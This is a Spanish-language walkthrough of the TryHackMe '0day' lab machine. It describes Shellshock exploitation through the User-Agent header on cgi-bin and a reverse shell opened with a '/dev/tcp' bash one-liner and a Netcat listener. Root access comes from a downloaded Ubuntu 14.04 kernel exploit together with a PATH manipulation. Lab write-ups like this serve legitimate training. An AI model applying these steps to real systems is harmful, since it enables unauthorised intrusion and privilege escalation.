TryHackme 0day
Última actualización
Última actualización
Hoy vamos a resolver la maquina 0day, es una maquina bonita de dificultad media muy sencilla.
Vamos por lo basico ya se la saben, Nmap para ver los puertos que estan abiertos.
Ahora igualmente usando Nmap lo lanzamos para ver que versiones y servicios corren para estos puertos.
Si vamos al puerto 80 donde esta la web este es lo que observamos nada util.
Ahora haciendo uso de Wfuzz vamos a enumerar directorios ocultos dentro de la maquina el cual nos encontramos con varios pero el que nos interesa es cgi-bin.
Ya que la maquina es vulnerable a un ShellShock y nos aprovecharemos de este directorio.
Y bueno de esta forma se explota un ShellShock el payload lo metemos en el User-Agent, observamos que podemos leer el /etc/passwd de la maquina, nos interpreta los comando es decir que podemos ganar acceso.
Ahora ganamos acceso en el User-Agent ponemos el tipica cadena de bash -i >& /dev/tcp/IP/Port 0>&1.
En la parte de abajo nos ponemos en escucha con Netcat y observamos que ganamos acceso como el usuario www-data.
Capturamos nuestra primera bandera la de user.txt.
Wachamos el kernel del ubuntu el cual es un 14.04 que es vulnerable a una escalada de privilegios.
Busca el exploit usando searchsploit ubuntu 14.04 y te descargas este exploit que esta hecho en C con este numero de identificado 37292.
Ahora en en nuestra maquina en local nos compartimos un servidor con python.
Como punto numero dos desde la maquina victima usando wget nos descargamos el .C.
Le cambiamos el nombre a ofs.c, pero si lo intentamos ejecutar como dice en el Poc del exploit nos dice No such file or directory en español No existe tal archivo o directorio, esto se refiere al compilador gcc.
La ruta de gcc es /usr/bin/gcc. Pero podemos manipular el PATH para que la ruta empieze donde nosotros queramos.
Si hacemos un echo $PATH. Observamos que el PATH inicia en /usr/local/bin.
Pero si hacemos un export PATH=/tmp:$PATH y volvemos a hacer un echo $PATH.
Observamos que el PATH ahora inicia donde nostros lo hemos definido en el directorio /tmp.
Ahora si seguimos el Poc que nos daban en el exploit y ejecutamos, observamos que nos convertimos en root, y bueno capturamos nuestra ultima bandera la de root.txt. Y bueno MAQUINA RESUELTA